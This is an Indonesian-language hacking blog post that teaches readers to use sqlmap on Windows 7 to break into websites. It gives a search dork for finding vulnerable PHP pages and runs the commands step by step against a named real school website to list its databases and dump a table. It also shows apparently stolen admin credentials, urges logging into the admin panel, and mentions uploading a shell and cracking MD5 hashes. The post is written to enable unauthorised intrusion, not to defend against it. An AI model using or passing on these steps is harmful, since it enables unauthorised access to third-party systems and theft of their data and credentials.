Tutorial SQLMAP Di Windows 7

0
udah lama engga hacking hackingan lagi ? :D
heheh rada males sih hehe
kali ini saya mau share tutorial sqlmap di win7 

Bahan :
- SQLMap Download - Link 1Link 2
- Python27 Download - Link 1 | Link 2
- Dork : inurl:/.php?*id=

[+] LANGKAHNYA MBAH BRO [+]

Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir  url target, contoh :

http://smkakp.sch.id/readmore.php?idreadmore=139 saya tambahin ' menjadi
http://smkakp.sch.id/readmore.php?idreadmore=139'
nah kalo vuln nanti ada tulisan "you have an error ...." mysql error dan sebagainya"

sekarang waktunya di hajar kalo udah ketemu web yang vuln :P


1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :
 
2. Stelah itu, kalian mulailah scan website target dengan perintah :
  • sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh Target : sqlmap.py -u http://smkakp.sch.id/readmore.php?idreadmore=139 --dbs klik [ENTER]
 
 
3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :
 Contoh Target : sqlmap.py -u  http://smkakp.sch.id/readmore.php?idreadmore=139 -D smkakpsc_gums --tables , maka hasilnya akan seperti ini :
 
 
4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
  • sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
contoh Target : sqlmap.py -u http://smkakp.sch.id/readmore.php?idreadmore=139 -D smkakpsc_gums -T form --columnstekan enter maka hasilnya akan seperti ini :


5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
  • sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump 
Contoh Target : sqlmap.py -u http://smkakp.sch.id/readmore.php?idreadmore=139 -D smkakpsc_gums -T form --dump , klik enter 
 
 Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :
  • do you want to crack them via a dictionary-based attack? [Y/n/q] 
Maka Hasilnya akan seperti ini :
 
 
Nah kita udah dapet tuh user sama passnya :D
 
user : rahasia2014
pass : webdaritommy
 
Sekarang tinggal login ke admin
 
 
*lagi males upload shell -_- , artikel aja dah :v
Hasil :

 
kalau dapet password aneh segera di pecahin itu md5nya caranya pergi ke :
 
Dah ya sekian dulu postingan saya, ane lagi males ngetik :D
sama kan kaya make backtrack 5 atau linux :D
semoga berhasiL
 

Content Creator :Erwin Pshycode